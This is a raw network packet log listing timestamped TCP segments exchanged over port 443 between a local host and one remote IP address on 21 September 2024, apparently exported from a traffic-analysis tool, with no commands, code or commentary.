                                                      Sep 21, 2024 14:45:32.232033968 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.232100010 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.232290983 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.232342958 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.232841015 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.232881069 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.232884884 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.232893944 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.232909918 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.232984066 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.233887911 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.233932018 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.233949900 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.233958960 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.233995914 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.285131931 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.285211086 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.285245895 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.285788059 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.285868883 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.285868883 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.285877943 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.285988092 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.286197901 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.286335945 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.286724091 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.286761045 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.286830902 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.286830902 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.286838055 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.286984921 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.287322044 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.287410021 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.287478924 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.287478924 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.287489891 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.287650108 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.288398981 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.288441896 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.288491011 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.288491011 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.288496971 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.288533926 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.322587967 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.322941065 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.322999001 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.322999954 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.322999954 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.323019028 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.323148012 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.323148012 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.323606968 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.323790073 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.324054956 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.324100018 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.324166059 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.324166059 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.324172974 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.324256897 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.375861883 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.376034021 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.376213074 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.376601934 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.376652956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.376652956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.376662970 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.376698017 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.377218962 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.377335072 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.377335072 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.377342939 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.377403975 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.377808094 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.377808094 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.377814054 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.378341913 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.378397942 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.378424883 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.378424883 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.378429890 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.378443003 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.378489017 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.378489017 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.379115105 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.379498005 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.413343906 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.413486958 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.413539886 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.413539886 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.413556099 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.413695097 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.413733006 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.413975000 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.414319992 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.414400101 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.414705038 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.414753914 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.414796114 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.414796114 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.414802074 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.415498018 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.431498051 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.466515064 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.466746092 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.466798067 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.466798067 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.466816902 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.467068911 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.467497110 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.467504025 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.467624903 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.467673063 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.468175888 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.468225956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.468225956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.468225956 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.468234062 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.468621969 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.469151974 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.469191074 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.469197989 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.469197989 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.469197989 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.469204903 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.469224930 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.470000029 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.470046043 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.470046043 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.470046043 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.470055103 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.470958948 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.499260902 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.504291058 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.504421949 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.505063057 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.505182981 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.505256891 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.505256891 CEST49700443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:32.505270958 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.505305052 CEST44349700142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:32.505350113 CEST49700443192.168.2.7142.11.212.184
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Sep 21, 2024 14:45:32.505424023 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.505635023 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.505714893 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.505736113 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.505906105 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.557641983 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.558156013 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.558219910 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.558219910 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.558239937 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.558259010 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.558387995 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.558417082 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.558428049 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.559022903 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559022903 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559302092 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.559413910 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559459925 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.559536934 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559614897 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.559716940 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.559762955 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559762955 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.559771061 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.560504913 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.560592890 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.560592890 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.560600996 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.560779095 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.560797930 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.560806036 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.560921907 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.560921907 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595135927 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595264912 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595304012 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595323086 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595355034 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595526934 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595642090 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595642090 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595652103 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595748901 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.595907927 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.595915079 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.596218109 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.596295118 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.596303940 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.596393108 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.596709013 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.596781015 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.648396969 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.648499012 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.648530006 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.648547888 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.648757935 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.648757935 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.648852110 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.648999929 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.649296999 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.649348974 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.649383068 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.649389029 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.649408102 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.649751902 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.649797916 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.649955034 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.650317907 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.650363922 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.650376081 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.650384903 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.650418043 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.650553942 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.651071072 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.651117086 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.651215076 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.651215076 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.651222944 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.651416063 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.685868979 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.686033964 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:32.895396948 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:32.895509005 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.072033882 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.072058916 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.072071075 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.072911978 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.072921038 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.072937012 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.074703932 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.074713945 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.074727058 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.074738026 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075139999 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.075146914 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075158119 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075170040 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075375080 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.075381041 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075400114 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075402975 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075546980 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.075553894 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075571060 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075576067 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.075579882 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.075663090 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.283396959 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.283495903 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:33.727400064 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:33.727504015 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.037936926 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.037955999 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:34.037967920 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:34.038336039 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.044666052 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.044672012 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:34.044683933 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:34.045758963 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.045767069 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:34.045917034 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.077522039 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.080637932 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.215919018 CEST  49700     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:34.215948105 CEST  443       49700     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:35.373944998 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.373992920 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:35.374062061 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.374375105 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.374387026 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:35.911839008 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:35.911916971 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.912509918 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.912523031 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:35.912759066 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:35.912765026 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.119874954 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.119904995 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.119942904 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.119972944 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.119988918 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.120017052 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.209899902 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.209983110 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.210741997 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.210804939 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.211487055 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.211546898 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.213031054 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.213102102 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.300430059 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.300524950 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.300766945 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.300847054 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.301624060 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.301687002 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.302494049 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.302553892 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.303404093 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.303464890 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.304316998 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.304384947 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.305130959 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.305201054 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.391072989 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.391140938 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.391485929 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.391544104 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.391762018 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.391820908 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.392371893 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.392433882 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.392784119 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.392834902 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.393224001 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.393280029 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.393671036 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.393729925 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.393894911 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.393942118 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.394664049 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.394726038 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.394941092 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.395020008 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.395587921 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.395646095 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.395849943 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.395901918 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.481481075 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.481559038 CEST  49701     443       192.168.2.7      142.11.212.184
